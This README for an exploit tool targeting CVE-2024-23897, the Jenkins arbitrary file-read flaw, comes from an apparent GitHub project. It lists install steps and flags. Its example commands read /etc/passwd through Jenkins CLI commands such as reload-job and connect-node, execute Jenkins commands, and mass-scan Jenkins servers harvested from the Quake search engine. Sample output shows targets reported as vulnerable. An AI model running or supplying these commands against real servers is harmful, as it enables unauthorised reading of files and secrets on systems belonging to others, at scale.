CVE-2024-23897 需要go 1.21
才能完成安装 执行以下命令
go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest
或者 安装完成的二进制文件在release中下载
CVE-2024-23897 -help
CVE-2024-23897 is a tool for scanning for CVE-2024-23897
Usage:
CVE-2024-23897 [flags]
Flags:
INPUT:
-url, -u string[] URL to scan. (e.g. -u https://example.com)
-list string[] File containing list of URLs to scan. (e.g. -list list.txt)
CONFIG:
-c, -command string[] JinKens Command to run. (e.g. -c 'who-am-i')
-a, -args string[] JinKens Command args.
-e, -exec JinKens Execute command.
-lac, -list-available-commands List available commands.
OUTPUT:
-no-color Don't Use colors in output
DEBUG:
-debug Enable debugging
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-version show version of CVE-2024-23897 tool
-header string[] Add custom headers(or on file contents) to the request(e.g. -header 'Cookie: username=admin' or -header header.txt)
-no-stdin disable stdin processing
LIMIT:
-timeout int time to wait in seconds before timeout (default 10)
-t, -thread int Number of concurrent threads (default 30)
-rl, -rate-limit int Rate limit for enumeration speed (n req/sec) (default -1)
UPDATE:
-update Update tool
-duc, -disable-update-check Disable update check
Examples:
Run CVE-2024-23897 check vulnerability on a single targets
$ CVE-2024-23897 -url https://example.com
Run CVE-2024-23897 check vulnerability on list of targets
$ CVE-2024-23897 -list list.txt
Run CVE-2024-23897 read full file contents on a single targets
$ CVE-2024-23897 -url https://example.com -c reload-job -a /etc/passwd
Run CVE-2024-23897 read available commands on a single targets
$ CVE-2024-23897 -url https://example.com -lac
Run CVE-2024-23897 execute the JenKings command
$ CVE-2024-23897 -url https://example.com -c reload-job -a job_name -exec
Run CVE-2024-23897 check vulnerability on a single targets by proxy server
$ CVE-2024-23897 -url https://example.com -proxy http://127.0.0.1:7890
Run CVE-2024-23897 on uncovering Jenkins check vulnerability
$ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
use pathScan to collect targets and pass them to CVE-2024-23897 via standard input
pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
To protect your privacy, I have deleted some outputs
➜ ~ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
_______ ________ ___ ____ ___ __ __ ___ _____ ____ ____ _____
/ ____| | / / ____/ |__ \/ __ |__ \/ // / |__ \|__ /( __ )/ __ /__ /
/ / | | / / __/________/ / / / __/ / // /_________/ / /_ </ __ / /_/ / / /
/ /___ | |/ / /__/_____/ __/ /_/ / __/__ __/_____/ __/___/ / /_/ /\__, / / /
\____/ |___/_____/ /____\____/____/ /_/ /____/____/\____//____/ /_/
Jenkins 任意文件读取漏洞
wjlin0.com
慎用。你要为自己的行为负责
开发者不承担任何责任,也不对任何误用或损坏负责.
[INF] Loaded 50 targets from input
[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable.
please use command and to read file first content.
$ CVE-2024-23897 -u https://example.com -c who-am-i -a /etc/passwd
[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable && This cab read full file contents
please use command and to read full body
$ CVE-2024-23897 -u https://example.com -c connect-node -a /etc/passwd
......
......
......
......
......
[INF] took 92.75 seconds with 13 successful requests
If you want to learn more about the vulnerability details, you can check out phith0n analysis of this vulnerability.